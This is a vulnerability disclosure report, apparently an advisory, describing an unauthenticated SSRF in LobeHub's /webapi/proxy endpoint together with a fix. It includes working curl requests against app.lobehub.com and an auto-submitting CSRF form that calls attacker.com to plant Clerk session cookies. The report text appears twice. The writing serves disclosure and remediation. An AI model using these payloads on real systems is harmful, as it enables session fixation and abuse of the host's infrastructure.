Unauthenticated SSRF in /webapi/proxy allows anyone to proxy requests and inject cookies on lobehub.com
Summary
The /webapi/proxy endpoint on app.lobehub.com accepts a URL in the POST body and fetches it server-side without any authentication. This is the same proxy code that was vulnerable in CVE-2024-32964, where /api/proxy was fixed by adding auth middleware. The /webapi/proxy route was never secured — it is the only webapi route missing the checkAuth() wrapper. An attacker can use this to make arbitrary outbound requests from LobeHub's infrastructure, leak Vercel deployment details, and inject cookies on the lobehub.com domain through reflected Set-Cookie headers.
Vulnerability Details
Type: Server-Side Request Forgery (CWE-918)
Affected Endpoint: POST /webapi/proxy
Vulnerable File: src/app/(backend)/webapi/proxy/route.ts
The route handler reads a URL from the request body and passes it to ssrfSafeFetch() without calling checkAuth() first. Every other webapi route (/webapi/chat/*, /webapi/models/*, /webapi/create-image/*) wraps the handler in checkAuth(), but the proxy does not. The Next.js middleware also skips /webapi/ routes — defaultMiddleware() calls NextResponse.next() for any path starting with /webapi/, so neither the route handler nor the middleware performs authentication.
Steps to Reproduce
Fetch an external URL through the proxy (no auth, no cookies, no tokens):
curl -X POST -H "Content-Type: text/plain;charset=UTF-8" \
-d "https://httpbin.org/ip" \
"https://app.lobehub.com/webapi/proxy"
Response:
{"origin": "3.14.141.44"}This is the IP of LobeHub's Vercel serverless function. The proxy fetched httpbin.org and returned the full response body.
Inject a cookie on the lobehub.com domain:
curl -D- -X POST -H "Content-Type: text/plain;charset=UTF-8" \
-d "https://httpbin.org/response-headers?Set-Cookie=__session%3Dmalicious%3BPath%3D%2F%3BDomain%3Dlobehub.com%3BSecure%3BHttpOnly" \
"https://app.lobehub.com/webapi/proxy"
The response headers include:
set-cookie: __session=malicious;Path=/;Domain=lobehub.com;Secure;HttpOnly
The proxy passes upstream response headers straight through (only stripping Content-Encoding and Content-Length). An attacker controls the upstream server, so they control which Set-Cookie headers are reflected. The __session and __clerk_db_jwt cookies are both injectable — these are the cookie names used by Clerk for authentication.
CSRF to cookie injection (no user interaction beyond visiting a page):
An attacker hosts the following HTML. When a victim opens it, the browser submits a form to the proxy, which fetches the attacker's server. The attacker's server responds with a Set-Cookie header, and the proxy reflects it. The victim's browser sets the cookie on lobehub.com because the response comes from app.lobehub.com.
<form id=f action="https://app.lobehub.com/webapi/proxy"
method=POST enctype="text/plain">
<input name="https://attacker.com/inject?x" value="">
</form>
<script>f.submit()</script>
The attacker's server at /inject?x= responds with Set-Cookie: __session=KNOWN_VALUE; Path=/; Domain=lobehub.com; Secure; HttpOnly. The proxy reflects this header and the victim's browser stores the cookie.
Impact
The proxy is fully unauthenticated and returns the complete response from any external URL. I confirmed the following on app.lobehub.com:
An attacker can inject authentication cookies (__session, __clerk_db_jwt, __client_uat) on the lobehub.com domain by chaining CSRF with the proxy's reflected Set-Cookie headers. If LobeHub uses Clerk for session management, this is a session fixation vector — the attacker sets a known session value before the victim logs in, then uses that same value to access the victim's session.
The proxy also leaks Vercel infrastructure details. The Traceparent and X-Vercel-Id headers from internal request tracing appear in every proxied response. The server's egress IP is exposed. Vercel Edge Config and the Vercel API are both reachable through the proxy (they return auth errors, not SSRF blocks), which means the proxy reaches Vercel's management plane.
The endpoint has no rate limiting. An attacker can use LobeHub's infrastructure as an anonymous proxy for scanning, phishing, or abusing IP-based trust relationships with third-party services.
Recommended Fix
Add checkAuth() to the proxy route, matching every other webapi route:
- export const POST = async (req: Request) => {
+ export const POST = checkAuth(async (req, { userId }) => {If the proxy is only needed for client-side URL previews, consider removing the endpoint entirely and handling previews in the browser.
References
0xj3st3r Reporter
Unauthenticated SSRF in /webapi/proxy allows anyone to proxy requests and inject cookies on lobehub.com
Summary
The
/webapi/proxyendpoint on app.lobehub.com accepts a URL in the POST body and fetches it server-side without any authentication. This is the same proxy code that was vulnerable in CVE-2024-32964, where/api/proxywas fixed by adding auth middleware. The/webapi/proxyroute was never secured — it is the only webapi route missing thecheckAuth()wrapper. An attacker can use this to make arbitrary outbound requests from LobeHub's infrastructure, leak Vercel deployment details, and inject cookies on thelobehub.comdomain through reflectedSet-Cookieheaders.Vulnerability Details
Type: Server-Side Request Forgery (CWE-918)
Affected Endpoint: POST /webapi/proxy
Vulnerable File:
src/app/(backend)/webapi/proxy/route.tsThe route handler reads a URL from the request body and passes it to
ssrfSafeFetch()without callingcheckAuth()first. Every other webapi route (/webapi/chat/*,/webapi/models/*,/webapi/create-image/*) wraps the handler incheckAuth(), but the proxy does not. The Next.js middleware also skips/webapi/routes —defaultMiddleware()callsNextResponse.next()for any path starting with/webapi/, so neither the route handler nor the middleware performs authentication.Steps to Reproduce
Fetch an external URL through the proxy (no auth, no cookies, no tokens):
Response:
{"origin": "3.14.141.44"}This is the IP of LobeHub's Vercel serverless function. The proxy fetched httpbin.org and returned the full response body.
Inject a cookie on the lobehub.com domain:
The response headers include:
The proxy passes upstream response headers straight through (only stripping
Content-EncodingandContent-Length). An attacker controls the upstream server, so they control whichSet-Cookieheaders are reflected. The__sessionand__clerk_db_jwtcookies are both injectable — these are the cookie names used by Clerk for authentication.CSRF to cookie injection (no user interaction beyond visiting a page):
An attacker hosts the following HTML. When a victim opens it, the browser submits a form to the proxy, which fetches the attacker's server. The attacker's server responds with a
Set-Cookieheader, and the proxy reflects it. The victim's browser sets the cookie onlobehub.combecause the response comes fromapp.lobehub.com.The attacker's server at
/inject?x=responds withSet-Cookie: __session=KNOWN_VALUE; Path=/; Domain=lobehub.com; Secure; HttpOnly. The proxy reflects this header and the victim's browser stores the cookie.Impact
The proxy is fully unauthenticated and returns the complete response from any external URL. I confirmed the following on app.lobehub.com:
An attacker can inject authentication cookies (
__session,__clerk_db_jwt,__client_uat) on thelobehub.comdomain by chaining CSRF with the proxy's reflectedSet-Cookieheaders. If LobeHub uses Clerk for session management, this is a session fixation vector — the attacker sets a known session value before the victim logs in, then uses that same value to access the victim's session.The proxy also leaks Vercel infrastructure details. The
TraceparentandX-Vercel-Idheaders from internal request tracing appear in every proxied response. The server's egress IP is exposed. Vercel Edge Config and the Vercel API are both reachable through the proxy (they return auth errors, not SSRF blocks), which means the proxy reaches Vercel's management plane.The endpoint has no rate limiting. An attacker can use LobeHub's infrastructure as an anonymous proxy for scanning, phishing, or abusing IP-based trust relationships with third-party services.
Recommended Fix
Add
checkAuth()to the proxy route, matching every other webapi route:If the proxy is only needed for client-side URL previews, consider removing the endpoint entirely and handling previews in the browser.
References